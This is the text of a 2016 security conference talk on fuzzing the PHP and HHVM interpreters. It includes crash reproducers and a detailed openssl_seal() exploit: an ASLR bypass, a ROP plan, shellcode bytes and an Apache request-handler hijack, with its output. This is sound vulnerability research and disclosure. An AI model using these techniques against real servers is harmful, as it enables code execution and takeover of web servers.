Torturing the PHP interpreter
Mateusz Kocielski
m.kocielski@logicaltrust.net
LogicalTrust
Confidence
Kraków, Poland, May 2016
$ whoami
pentester at LogicalTrust as $DAYJOB
blog: http://akat1.pl, twitter: @akat1_pl
open source committer:
NetBSD - libsaslc(3) & httpd(8) & security-team@ & random
things...
security:
PHP - CVE-2010-1868, CVE-2010-1917, CVE-2010-4150,
CVE-2010-4156, CVE-2011-1938, ...
stunnel - CVE-2013-1762
OpenSSH - CVE-2011-0539
Apache - CVE-2014-0117, CVE-2014-0226
FreeBSD - CVE-2015-1414
NetBSD - CVE-2015-8212
...
The hardest part of this talk is...
source: http://blog.codinghorror.com/
...to tell you that I’m a PHP developer.
The tortures - master plan
source: http://oaklandacupunctureproject.com/wp-content/uploads/2013/12/its-easy.jpg
torture
identify bugs
exploit bugs
get profit
repeat
Minerva Fuzzer
fuzzer released at Month of PHP Security in 2010
dedicated to uncover bugs in PHP functions by generating valid
random scripts
written in Python (around 1000 loc)
friendly Beerware license
version from 2010 is available here:
http://php-security.org/downloads/minerva-1.0.tar.bz2
at some point I’m going to release new version
short paper about it:
http://php-security.org/2010/05/11/mops-submission-05-the-minerva-php-fuzzer/index.html
Minerva - 5 years later
5 years ago I talked about it at local OWASP meeting (to be
specific 4 years and 362 days ago)
we released an exploit that was capable of hijacking all requests
that were sent to the Apache server
...this time we want to do it again but in the new reality (NX,
ASLR’n’stuff turned on by default)
we improved our fuzzing process a lot during the last few years
slides in Polish: http://www.slideshare.net/logicaltrust/201105-owasp-fuzzing-interpretera-php
Minerva algorithm - the idea
1. script ← ""
2. X ← initial set of variables with their types
3. G ← fresh variable generator
4. F ← function database
5. for i in 1..n:
5.1 f ← GET_RANDOM(F, X)
5.2 v ← G()
5.3 script ← script . v . " = " . f called with random arguments from X
(but with proper types)
5.4 X ← X ∪ (v, f result type)
6. return script
Erghghg... what?
Minerva algorithm - the idea - example
F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...}
X = ∅
x, y - simple types
1. v1 = A(); X = {x : {v1}}
2. v2 = B(v1, v1); X = {x : {v1, v2}}
3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}}
4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}}
5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}}
6. ...repeat it until crash
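The algorithm above, as an added example in Python (not Minerva's own code): a type-directed generator in the spirit of the slides. The function database F and the init variables are constructed for this example; Minerva reads its real ones from the configuration file shown later.

```python
import random

# Constructed function database F: (name, argument types, result type).
# The names are real PHP functions, but the list is illustrative only.
FUNCTION_DB = [
    ("strlen", ("string",), "int"),
    ("strrev", ("string",), "string"),
    ("str_repeat", ("string", "int"), "string"),
    ("abs", ("int",), "int"),
    ("intdiv", ("int", "int"), "int"),
    ("explode", ("string", "string"), "array"),
    ("implode", ("string", "array"), "string"),
    ("count", ("array",), "int"),
    ("array_fill", ("int", "int", "int"), "array"),
    ("stream_context_create", (), "resource"),
    ("is_resource", ("resource",), "bool"),
]

# Constructed "init" section: type -> [(variable, PHP literal)], in the
# style of the $str_1/$str_3 variables of the proper-types example.
INIT_VARS = {
    "string": [("$str_1", '"abc"'), ("$str_3", '"a,b,c"')],
    "int": [("$int_1", "3")],
}


def callable_functions(db, X):
    """GET_RANDOM's candidate set: functions whose every argument type
    already has at least one variable in X.  This is what keeps the
    generated script valid PHP with properly typed arguments."""
    return [f for f in db if all(X.get(t) for t in f[1])]


def generate(db, init, n, seed=0, header="<?php", footer=""):
    """Run the slide's algorithm for n steps.

    Returns (script, X, calls): the PHP script text, the final map
    type -> [variables], and one (v, function, args) record per generated
    line so callers can check the typing.  Same seed, same script."""
    rng = random.Random(seed)
    lines = [header]
    X = {}
    for typ, decls in init.items():                # 2. initial typed variables
        for name, literal in decls:
            lines.append(f"{name} = {literal};")
            X.setdefault(typ, []).append(name)
    fresh = (f"$var{i}" for i in range(n))         # 3. fresh variable generator G
    calls = []
    for v in fresh:                                # 5. for i in 1..n
        candidates = callable_functions(db, X)     # 5.1 f <- GET_RANDOM(F, X)
        if not candidates:
            raise ValueError("no function in F is callable with the variables in X")
        name, arg_types, result_type = rng.choice(candidates)
        args = [rng.choice(X[t]) for t in arg_types]        # random args of proper type
        lines.append(f"{v} = {name}({', '.join(args)});")   # 5.3 append the call
        X.setdefault(result_type, []).append(v)    # 5.4 X <- X U (v, result type)
        calls.append((v, name, args))
    if footer:
        lines.append(footer)
    return "\n".join(lines) + "\n", X, calls


if __name__ == "__main__":
    script, _, _ = generate(FUNCTION_DB, INIT_VARS, 10, seed=2016)
    print(script)
```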
Minerva - example script (dummy type)
<?php
[...]
$var0 = stream_context_get_default();
$var1 = is_object($var0);
$var2 = pcntl_wait($var0,$var1);
$var3 = create_function($var1,$var0);
$var4 = stream_context_create();
$var5 = ftp_rawlist($var3,$var4,$var3);
$var6 = is_dir($var2);
$var7 = preg_filter($var4,$var3,$var5,$var3,$var2);
$var8 = is_float($var7);
$var9 = openssl_pkey_export_to_file($var3,$var1,$var5);
[...]
Minerva - example script (proper types)
<?php
[...]
$var0 = inet_ntop($b);
$var1 = readline_write_history();
$var2 = urlencode($str_1);
$var3 = rtrim($str_3,$str_3);
$var4 = dba_handlers();
$var5 = stream_context_create();
$var6 = idate($str_3);
$var7 = ftp_rawlist($var5,$var2);
$var8 = ksort($var7);
$var9 = use_soap_error_handler();
[...]
Minerva - template
+-------------------+
| header | - header file (i.e. <?php)
+-------------------+
| init | - initialization (variables etc.)
+-------------------+
| generated script | - minerva algorithm
. .
. .
| |
+-------------------+
| fini | - destructors
+-------------------+
| footer | - footer file (i.e. ?>)
+-------------------+
Minerva - configuration file
main {
default_length = 100;
default_output = output.php;
init = conf/init.php;
fini = conf/fini.php;
modules = [ standard, sqlite ];
ignore_functions = [sleep, leak_variable, (...)];
}
functions {
standard = [
dummy zend_version(void),
dummy func_num_args(void),
[...]
];
Our approach:
source: http://www.jtpedals.com
we use something(tm) to cluster crashes
we use Jenkins to automate things
more on our thoughts about fuzzing:
http://www.slideshare.net/slajdszer/fuzzing-challenges-alligatorcon
Tips & tricks
start with small scripts (crashes generated by large ones are likely
unreproducible)
do not stress SSD drives
you want to use Address Sanitizer (or other sanitizers)
USE_ZEND_ALLOC=0 - use the libc allocator instead of the internal
one
learn to automate (dedup crashes etc.)
timelimit(1) is very useful!
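As an added example (not code from the talk), a small crash-bucketing script of the kind the "dedup crashes" tip calls for: it keys each sanitizer report on its error class and the first non-runtime stack frame, so reports that differ only in PID and addresses land in one bucket, and the summary comes out in the total/unique form of the result slides. The sample reports are constructed to resemble the ASan output shown later on these slides; their PIDs, addresses and line numbers are made up.

```python
import re
from collections import Counter, defaultdict

# "==<pid>==ERROR: AddressSanitizer: <kind> ..." - the kind is the first token
ERROR_RE = re.compile(r"==\d+==\s*ERROR: AddressSanitizer: (\S+)")
# "#N 0x... in <function> <file>:<line>[:col]" - the function may contain
# spaces (C++ signatures), the path may not
FRAME_RE = re.compile(
    r"^\s*#(\d+)\s+0x[0-9a-f]+\s+in\s+(.+?)\s+(\S+):(\d+)(?::\d+)?\s*$", re.M)
# sanitizer runtime frames (interceptors) say nothing about where the bug is
RUNTIME_FRAME_PREFIXES = ("__interceptor_", "__asan_", "__sanitizer")


def classify(report):
    """Error class in the wording the result slides use."""
    m = ERROR_RE.search(report)
    if m is None:
        return "unknown crash"        # no sanitizer report at all
    kind = m.group(1)
    return "segmentation fault" if kind == "SEGV" else kind


def top_frame(report):
    """(function, file, line) of the first non-runtime frame, or None."""
    for _num, func, path, line in FRAME_RE.findall(report):
        if func.startswith(RUNTIME_FRAME_PREFIXES):
            continue
        return func, path, int(line)
    return None


def bucket(reports):
    """reports: {test_case_id: sanitizer output}.  Returns
    {(error class, top frame): sorted ids}; one bucket is one unique crash."""
    buckets = defaultdict(list)
    for rid, text in reports.items():
        buckets[(classify(text), top_frame(text))].append(rid)
    return {key: sorted(ids) for key, ids in buckets.items()}


def summarize(buckets):
    """{error class: (total crashes, unique crashes)}, like the result slides."""
    total, unique = Counter(), Counter()
    for (cls, _frame), ids in buckets.items():
        total[cls] += len(ids)
        unique[cls] += 1
    return {cls: (total[cls], unique[cls]) for cls in total}


# Constructed sample reports (PIDs, addresses and line numbers are made up)
DIRNAME_FRAMES = """\
    #0 0x7b83c10 in HPHP::FileUtil::dirname_helper(char*, int) /src/hhvm/hphp/runtime/base/file-util.cpp:348
    #1 0x7b8f2a0 in HPHP::f_dirname(HPHP::String const&) /src/hhvm/hphp/runtime/ext/std/ext_std_file.cpp:1871
"""
SAMPLE_REPORTS = {
    "tc0001": "==27833==ERROR: AddressSanitizer: heap-buffer-overflow on address "
              "0x602000239e11 at pc 0x7b83c11 bp 0x7fffffffb430 sp 0x7fffffffb428\n"
              "WRITE of size 1 at 0x602000239e11 thread T0\n" + DIRNAME_FRAMES,
    "tc0002": "==28104==ERROR: AddressSanitizer: heap-buffer-overflow on address "
              "0x60200031ac11 at pc 0x7b83c11 bp 0x7fffffffb430 sp 0x7fffffffb428\n"
              "WRITE of size 1 at 0x60200031ac11 thread T0\n" + DIRNAME_FRAMES,
    # the same bug, reached through a memcpy interceptor frame
    "tc0003": "==29555==ERROR: AddressSanitizer: heap-buffer-overflow on address "
              "0x602000400e11 at pc 0x4a0c12 bp 0x7fffffffb400 sp 0x7fffffffb3f8\n"
              "WRITE of size 1 at 0x602000400e11 thread T0\n"
              "    #0 0x4a0c11 in __interceptor_memcpy /src/llvm/compiler-rt/lib/asan/asan_interceptors.cc:400\n"
              + DIRNAME_FRAMES,
    "tc0004": "==15187==ERROR: AddressSanitizer: heap-use-after-free on address "
              "0x600600023235 at pc 0xf89a78 bp 0x7fff001c2ec0 sp 0x7fff001c2eb8\n"
              "READ of size 1 at 0x600600023235 thread T0\n"
              "    #0 0xf89a77 in zif_error_reporting /src/php-7.0.2/main/main.c:1000\n",
    "tc0005": "==5772==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000002a0 "
              "(pc 0x0000010d9674 sp 0x7fff2006d5a0 bp 0x7fff2006d650 T0)\n"
              "    #0 0x10d9673 in zif_pcntl_wait /src/php-7.0.2/ext/pcntl/pcntl.c:500\n",
    # plain crash with no sanitizer output at all
    "tc0006": "Segmentation fault (core dumped)\n",
}

if __name__ == "__main__":
    for key, ids in bucket(SAMPLE_REPORTS).items():
        print(key, ids)
    print(summarize(bucket(SAMPLE_REPORTS)))
```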
Tips & tricks
source: http://pearlsofpromiseministries.com
OpenGrok - http://lxr.php.net/
HHVM has bug bounty run by Facebook
https://github.com/facebook/hhvm
PHP bugs are awarded by IBB bug bounty
https://hackerone.com/ibb-php
The results - PHP 7.x - (HEAD)
source: http://images.phpgang.com
one machine: 8 cores + 16 GB RAM + SSD
5 days + 8 threads = around 4 million executions
cost: around 30 PLN = 7.5 USD
10-50 lines of code generated per test case
around 4150 crashes (55 were unique):
1. unknown crash - 24
2. segmentation fault - 19
3. heap use after free - 6
4. heap buffer overflow - 4
5. stack buffer overflow - 1
6. double free - 1
The results - HHVM (HEAD)
source: http://www.clipartbest.com
one machine: 8 cores + 16 GB RAM + SSD
5 days + 4 threads = around 800 thousand executions
cost: around 30 PLN = 7.5 USD
10-50 lines of code generated per test case
around 956 crashes (63 were unique):
1. unknown crash - 33
2. segmentation fault - 19
3. heap-use-after-free - 6
4. heap-buffer-overflow - 5
The results - distribution of crashes
HHVM - HPHP::f_dirname - heap-overflow
<?php pathinfo("\x00");
HPHP::f_dirname (path=...) at
/src/hhvm/hphp/runtime/ext/std/ext_std_file.cpp:
[...]
1870 char *buf = strndup(path.data(), path.size());
1871 int len = FileUtil::dirname_helper(buf, path.size());
[...]
==27833==ERROR: AddressSanitizer: heap-buffer-overflow on
address 0x602000239e11 at pc 0x7b83c11
bp 0x7fffffffb430 sp 0x7fffffffb428
WRITE of size 1 at 0x602000239e11 thread T0
#0 0x7b83c10 in HPHP::FileUtil::dirname_helper(char*, int)
/src/hhvm/hphp/runtime/base/file-util.cpp:348
PHP - error_reporting - use-after-free
<?php
error_reporting(1);
$var11 = date_create_immutable();
$var16 = error_reporting($var11);
Log: Fixed bug #72162 (use-after-free - error_reporting)
Log: Fix bug #72162 (again)
Log: Revert "Fix bug #72162 (again)"
==15187== ERROR: AddressSanitizer: heap-use-after-free
on address 0x600600023235 at pc 0xf89a78
bp 0x7fff001c2ec0 sp 0x7fff001c2eb8
READ of size 1 at 0x600600023235 thread T0
PHP - pcntl_wait/pcntl_waitpid
<?php $b = 666; $c = &$b;
$var5 = pcntl_wait($b,0,$c); unset($b);
- convert_to_long_ex(z_status);
-
- status = Z_LVAL_P(z_status);
+ status = zval_get_long(z_status);
array_init(z_rusage);
- Z_LVAL_P(z_status) = status;
+ zval_dtor(z_status);
+ ZVAL_LONG(z_status, status);
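Review bot: the new `zval_dtor(z_status);` placed right after `array_init(z_rusage);` is doing double duty and deserves a comment: when the two by-reference arguments alias the same zval, as in the reproducer above where `$c` is a reference to `$b` and both are passed to pcntl_wait, the dtor destroys the rusage array that was just created and `ZVAL_LONG(z_status, status);` then replaces it with the status. That removes the type confusion the old in-place `Z_LVAL_P(z_status) = status;` caused (writing a long over an array pointer), but it also silently discards rusage in the aliased case, so state in a comment that the dtor exists for that case and that status wins. Switching the read to `zval_get_long(z_status)` instead of `convert_to_long_ex(z_status);` is the right part of the change, since it no longer mutates the caller's variable before the array is built.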
==5772== ERROR: AddressSanitizer: SEGV on unknown
address 0x0000000002a0 (pc 0x0000010d9674
sp 0x7fff2006d5a0 bp 0x7fff2006d650 T0)
Exploiting bugs - PHP & HEAP related problems
heap overflows
use-after-free - unserialize() - CVE-2015-0273
double frees - imap_open() - CVE-2010-4150
5.x era allocator description - http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/index.html#__exploitation
FWIW, the allocator is a LIFO queue
usually the scenario is pretty much the same: take control over
zval/array memory guts
Exploiting bugs - PHP & other bugs
similar to other software
uninitialized memory access - sqlite_array_query() - http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/index.html
the heap is your friend (in non-debug builds)
everything with a dtor_func_t is your friend, e.g.:
176 struct _zend_array {
177 zend_refcounted_h gc;
[...]
195 dtor_func_t pDestructor;
196 };
http://lxr.php.net/xref/PHP_7_0/Zend/zend_types.h#195
Example - openssl_seal()
in 2011 we hijacked all connections to the webserver using a buffer
overflow in socket_connect() -
http://seclists.org/fulldisclosure/2011/May/472
Minerva found uninitialized memory usage in openssl_seal(). How
hard would it be to do the same in 2016?
we assume we operate on Ubuntu 14.04 LTS with Apache 2.4.7
and PHP 7.0.2 (compiled manually, as most distros still use the 5.x
branch).
openssl_seal() - the bug - 1/2
4888 /* {{{ proto int openssl_seal(string data, &string sealdata, &
4889 Seals data */
4890 PHP_FUNCTION(openssl_seal)
4891 {
4892 zval *pubkeys, *pubkey, *sealdata, *ekeys, *iv = NULL;
[...]
4935 pkeys = safe_emalloc(nkeys, sizeof(*pkeys), 0);
[...]
4942 /* get the public keys we are using to seal this data */
4943 i = 0;
4944 ZEND_HASH_FOREACH_VAL(pubkeysht, pubkey) {
4945 pkeys[i] = php_openssl_evp_from_zval(pubkey, 1, NULL, 0, &key_resources[i]);
4946 if (pkeys[i] == NULL) {
4949 goto clean_exit;
http://lxr.php.net/xref/PHP_7_0/ext/openssl/openssl.c
openssl_seal() - the bug - 2/2
[...]
5000 clean_exit:
5001 for (i=0; i<nkeys; i++) {
5002 if (key_resources[i] == NULL) {
5003 EVP_PKEY_free(pkeys[i]);
[...]
http://lxr.php.net/xref/PHP_7_0/ext/openssl/openssl.c
openssl_seal() - is it exploitable?
376 void EVP_PKEY_free(EVP_PKEY *x)
377 {
[...]
380 if (x == NULL)
381 return;
383 i = CRYPTO_add(&x->references, -1, CRYPTO_LOCK_EVP_PKEY);
387 if (i > 0)
388 return;
395 EVP_PKEY_free_it(x);
[...]
401 static void EVP_PKEY_free_it(EVP_PKEY *x)
402 {
403 if (x->ameth && x->ameth->pkey_free) {
404 x->ameth->pkey_free(x);
[...]
openssl_seal() - our plan
1. Stage 1 (pwning PHP)
1.1 control uninitialized memory
1.2 get (or guess) a pointer that will act as a fake EVP_PKEY structure
1.3 push that pointer as a value to EVP_PKEY_free()
1.4 based on guesses (or leaks), build a ROP chain allowing us to
execute data
1.5 execute the 2nd stage shellcode
2. Stage 2 (pwning Apache)
2.1 guess/find handler addresses
2.2 overwrite the first handler with our evil one
2.3 get back home (do not crash the Apache child)
openssl_seal() - RIP control
~/src/php-7.0.2/sapi/cli$ gdb ./php
(gdb) r -r 'str_repeat("A", 512); openssl_seal($_, $_, $_, array_fill(0,64,0));'
Starting program: /home/rj4/src/php-7.0.2/sapi/cli/php -r 'str_repeat("A", 512);
openssl_seal($_, $_, $_, array_fill(0,64,0));'
[...]
0x00007ffff5a3d837 in CRYPTO_add_lock () from /lib/x86_64-linux-gnu/libc[...]
(gdb) x/i $rip
=> 0x7ffff5a3d837 <CRYPTO_add_lock+71>: add (%r12),%r13d
(gdb) i r
[...]
r12 0x208 520
(gdb) print pkeys[i]
$11 = (EVP_PKEY *) 0x200
(gdb) print pkeys[i+1]
$12 = (EVP_PKEY *) 0x4141414141414141
(gdb) print pkeys[i+2]
$13 = (EVP_PKEY *) 0x4141414141414141
openssl_seal() - RIP control
~/src/php-7.0.2/sapi/cli$ cat 2.php
<?php
$pem = "
-----BEGIN PUBLIC KEY-----
MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRANG2dvm8oNiH3IciNd44VZcCAwEAAQ==
-----END PUBLIC KEY-----"; /* Random RSA key */
$a = array_fill(0,64,0);
$k = openssl_pkey_get_public($pem);
$a[0] = $k; $a[1] = $k; $a[2] = $k;
var_dump($k);
str_repeat("A", 512);
openssl_seal($_, $_, $_, $a);
~/src/php-7.0.2/sapi/cli$ gdb ./php
[...]
openssl_seal() - RIP control
(gdb) r 2.php
[...]
(gdb) print pkeys[i]
$1 = (EVP_PKEY *) 0x4141414141414141
openssl_seal() - Memory layout
pkeys (openssl_seal())
+----------+----------+----------+----------+-----
| pkeys[0] | pkeys[1] | pkeys[2] | pkeys[3] | ...
+----------+----------+----------+----------+---
|
+------------------------------------+
v EVP_PKEY
+------+-----------+------------+-------+-----
| type | save_type | references | ameth | ...
+------+-----------+------------+-------+---
|
+------------------------------------+
v EVP_PKEY_ASN1_METHOD
+---------+--- -+-----------+----
| pkey_id | ... | pkey_free | ...
+---------+- ---+-----------+---
openssl_seal() - ASLR bypass
<?php
function get_maps() {
$fh = fopen("/proc/self/maps", "r");
$maps = fread($fh, 31337^2);
fclose($fh);
return explode("\n", $maps);
}
[...]
$pre = get_maps();
$buffer = str_repeat("\x00", 0xff0000);
$post = get_maps();
$tmp = array_diff($post, $pre);
$tmp = explode('-', array_values($tmp)[0])[0];
for ($i = 0; $i < 8; $i++)
$buffer[0xff + 12 + $i] = pack('P', $addr)[$i];
[...]
openssl_seal() - ROP
we use ROP technique to neutralise NX
we ended up using gadgets from the PHP binary
to pivot the stack we used the address of our controlled buffer,
which luckily was on the stack
then we call mprotect() and set RWX perms
exploit code is here: http://akat1.pl/?id=1
openssl_seal() - pwning PHP
~/src/php-7.0.2-test/sapi/cli$ ./php 3.php
[+] buffer string @ 0x7f00ef400014
[+] faking EVP_PKEY @ 0x7f00ef400113
[+] faking ASN @ 0x7f00ef400113
[+] faking pkey_free @ 0x7f00ef4001af = a59203
[+] libc base @ 0x7f00f1540000
[+] mprotect @ 0x7f00f1634a20
[+] building ropchain
[+] triggering openssl_seal(), spawning shell
have phun...
$
openssl_seal() - it's so useless
source: http://www.ifunny.com
openssl_seal() - hijacking apache2 requests
source: http://linuxconfig.net
Here’s what we want to do:
1. register memory that will survive subsequent requests
2. copy Apache handler code to the registered memory
3. register request handler that will be run really first
4. do something to clean the corrupted state and let Apache child
process happily serve subsequent requests
openssl_seal() - shellcode - steps 1-3
void
shellcode(void *(mmap_addr)(void *, size_t, int, int, int, off_t),
void *(memcpy_addr)(void *, void *, size_t),
int (*ap_hook_quick_handler_addr)(void *, void *, void *, int),
unsigned char *handler, size_t len)
{
void *handler_space;
unsigned char *p;
/* create space for our handler, as it needs to survive sequential
* requests */
p = handler_space = mmap_addr(0, 0x2000, PROT_WRITE|PROT_EXEC|PROT_READ,
MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
/* ~memcpy(3) */
while(len--)
*(p++) = *(handler++);
/* register new filter */
ap_hook_quick_handler_addr(handler_space, NULL, NULL, APR_HOOK_REALLY_FIRST);
}
openssl_seal() - shellcode - handler
#define APR_HOOK_REALLY_FIRST (-10)
#define OK (0)
int
handler(void *r)
{
void (*ap_rprintf_addr)(char *, void *) = (void *)0xdead;
char content[16] = "hello world";
(ap_rprintf_addr)(r, content);
return OK;
}
openssl_seal() - how to survive
PHP has a mechanism that kills scripts that run for too long;
it is based on signals.
if we deliver a SIGPROF signal to the process, then PHP will take
care of recovering our victim for us.
$shellcode_stage1 = str_repeat("\x90",512) .
"\x48\xb8" . pack('P', $buffer_base + 0x2018) . // movabs shellcode_stage2, %rax
"\x49\xb8" . pack('P', 0x1000) . // handler size
"\x48\xb9" . pack('P', $buffer_base + 0x3018) . // handler
"\x48\xba" . pack('P', $ap_hook_handler_addr) . // movabs ap_hook_quick_handler, %rdx
"\x48\xbe" . pack('P', 0) . // UNUSED
"\x48\xbf" . pack('P', $mmap_addr) . // movabs mmap,%rdi
"\xff\xd0" . // callq %rax
"\xb8\x27\x00\x00\x00" . // mov $0x27,%eax - getpid syscall
"\x0f\x05" . // syscall
"\xbe\x1b\x00\x00\x00" . // mov $0x1b,%esi - SIGPROF
"\x89\xc7" . // mov %eax,%edi - pid
"\xb8\x3e\x00\x00\x00" . // mov $0x3e,%eax - kill syscall
"\x0f\x05"; // syscall
openssl_seal() - pwning apache2handler
$ curl http://localhost:10080/~rj4/exp.php
[+] buffer string @ 0x7f3d66c00014
[+] faking EVP_PKEY @ 0x7f3d66c00113
[+] faking ASN @ 0x7f3d66c00113
[...]
[+] mmap @ 0x7f3d763c49c0
[+] apache2 base @ 0x7f3d77180000
[+] ap_rprintf @ 0x7f3d771c29c0
[+] ap_hook_quick_handler @ 0x7f3d771d6c00
[+] building ropchain
[+] spraying heap
[+] triggering openssl_seal()...
execute it a few times to infect all children
openssl_seal() - pwning apache2handler - result
source: https://marinasleeps.files.wordpress.com/
$ curl http://localhost:10080/~rj4/exp.php
Hello World!
$ curl http://localhost:10080/whatever
Hello World!
Why should I care?
source: http://www.badideatshirts.com/
apache2 + mod_php is a quite popular configuration (more than
650 thousand servers according to a shodan.io search)
this attack vector can be used to bypass disabled functions
(easier methods exist, it's just another one)
running buggy software is risky
there are other bugs...
What can I do?
source: http://cdn.quotesgram.com/
keep your software up to date
unload unnecessary extensions
do not rely on disabled functions
do not rely on open_basedir
do not run PHP as mod_php
do not trust your software
Future work
port Minerva to any language → Minerva$lang
code coverage improvement
for now we ignore the fact that PHP is an object-oriented language
generate language constructs
variables mutation
test case minimization
use code coverage as input to fuzzer (like in AFL or autodafe)
implement type casts
implement mocks for some backends
...your ideas.
Credits
Large parts of this presentation were done in cooperation with
Marek Kroemeke and Filip Palian, THANKS!
Some reading material
http://akat1.pl/?id=1
http://www.phpinternalsbook.com/
http://php-security.org/2010/05/11/mops-submission-05-the-minerva-php-fuzzer/index.html
http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/index.html
http://www.inulledmyself.com/2015/02/exploiting-memory-corruption-bugs-in.html
http://lxr.php.net/
Time for questions (and maybe answers)
Q&A
m.kocielski@logicaltrust.net
http://akat1.pl/ @akat1_pl
[CONFidence 2016] Mateusz Kocielski - Torturing the PHP interpreter

 
infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...
infraxstructure: Robert Mroczkowski  "Maszyny się uczą - admińskie rozmówki p...infraxstructure: Robert Mroczkowski  "Maszyny się uczą - admińskie rozmówki p...
infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...
 
infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...
infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...
infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...
 

Similar to [CONFidence 2016] Mateusz Kocielski - Torturing the PHP interpreter

TypeScript Introduction
TypeScript IntroductionTypeScript Introduction
TypeScript IntroductionDmitry Sheiko
 
The groovy puzzlers (as Presented at Gr8Conf US 2014)
The groovy puzzlers (as Presented at Gr8Conf US 2014)The groovy puzzlers (as Presented at Gr8Conf US 2014)
The groovy puzzlers (as Presented at Gr8Conf US 2014)GroovyPuzzlers
 
Ownership System in Rust
Ownership System in RustOwnership System in Rust
Ownership System in RustChih-Hsuan Kuo
 
Introducción a Elixir
Introducción a ElixirIntroducción a Elixir
Introducción a ElixirSvet Ivantchev
 
talk at Virginia Bioinformatics Institute, December 5, 2013
talk at Virginia Bioinformatics Institute, December 5, 2013talk at Virginia Bioinformatics Institute, December 5, 2013
talk at Virginia Bioinformatics Institute, December 5, 2013ericupnorth
 
Pythonbrasil - 2018 - Acelerando Soluções com GPU
Pythonbrasil - 2018 - Acelerando Soluções com GPUPythonbrasil - 2018 - Acelerando Soluções com GPU
Pythonbrasil - 2018 - Acelerando Soluções com GPUPaulo Sergio Lemes Queiroz
 
ECMAScript 6 new features
ECMAScript 6 new featuresECMAScript 6 new features
ECMAScript 6 new featuresGephenSG
 
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021Peng Cheng
 
Assignment on Numerical Method C Code
Assignment on Numerical Method C CodeAssignment on Numerical Method C Code
Assignment on Numerical Method C CodeSyed Ahmed Zaki
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeLaurence Svekis ✔
 
Damn Fine CoffeeScript
Damn Fine CoffeeScriptDamn Fine CoffeeScript
Damn Fine CoffeeScriptniklal
 
Numerical tour in the Python eco-system: Python, NumPy, scikit-learn
Numerical tour in the Python eco-system: Python, NumPy, scikit-learnNumerical tour in the Python eco-system: Python, NumPy, scikit-learn
Numerical tour in the Python eco-system: Python, NumPy, scikit-learnArnaud Joly
 
NTU ML TENSORFLOW
NTU ML TENSORFLOWNTU ML TENSORFLOW
NTU ML TENSORFLOWMark Chang
 
C# 6.0 - April 2014 preview
C# 6.0 - April 2014 previewC# 6.0 - April 2014 preview
C# 6.0 - April 2014 previewPaulo Morgado
 
Pick up the low-hanging concurrency fruit
Pick up the low-hanging concurrency fruitPick up the low-hanging concurrency fruit
Pick up the low-hanging concurrency fruitVaclav Pech
 
Let's build a parser!
Let's build a parser!Let's build a parser!
Let's build a parser!Boy Baukema
 

Similar to [CONFidence 2016] Mateusz Kocielski - Torturing the PHP interpreter (20)

TypeScript Introduction
TypeScript IntroductionTypeScript Introduction
TypeScript Introduction
 
The groovy puzzlers (as Presented at Gr8Conf US 2014)
The groovy puzzlers (as Presented at Gr8Conf US 2014)The groovy puzzlers (as Presented at Gr8Conf US 2014)
The groovy puzzlers (as Presented at Gr8Conf US 2014)
 
Chapter 02 functions -class xii
Chapter 02   functions -class xiiChapter 02   functions -class xii
Chapter 02 functions -class xii
 
Ownership System in Rust
Ownership System in RustOwnership System in Rust
Ownership System in Rust
 
Introducción a Elixir
Introducción a ElixirIntroducción a Elixir
Introducción a Elixir
 
talk at Virginia Bioinformatics Institute, December 5, 2013
talk at Virginia Bioinformatics Institute, December 5, 2013talk at Virginia Bioinformatics Institute, December 5, 2013
talk at Virginia Bioinformatics Institute, December 5, 2013
 
Pythonbrasil - 2018 - Acelerando Soluções com GPU
Pythonbrasil - 2018 - Acelerando Soluções com GPUPythonbrasil - 2018 - Acelerando Soluções com GPU
Pythonbrasil - 2018 - Acelerando Soluções com GPU
 
Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2
 
ECMAScript 6 new features
ECMAScript 6 new featuresECMAScript 6 new features
ECMAScript 6 new features
 
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
 
Assignment on Numerical Method C Code
Assignment on Numerical Method C CodeAssignment on Numerical Method C Code
Assignment on Numerical Method C Code
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your code
 
Damn Fine CoffeeScript
Damn Fine CoffeeScriptDamn Fine CoffeeScript
Damn Fine CoffeeScript
 
Numerical tour in the Python eco-system: Python, NumPy, scikit-learn
Numerical tour in the Python eco-system: Python, NumPy, scikit-learnNumerical tour in the Python eco-system: Python, NumPy, scikit-learn
Numerical tour in the Python eco-system: Python, NumPy, scikit-learn
 
NTU ML TENSORFLOW
NTU ML TENSORFLOWNTU ML TENSORFLOW
NTU ML TENSORFLOW
 
Intro to Python
Intro to PythonIntro to Python
Intro to Python
 
Matlab algebra
Matlab algebraMatlab algebra
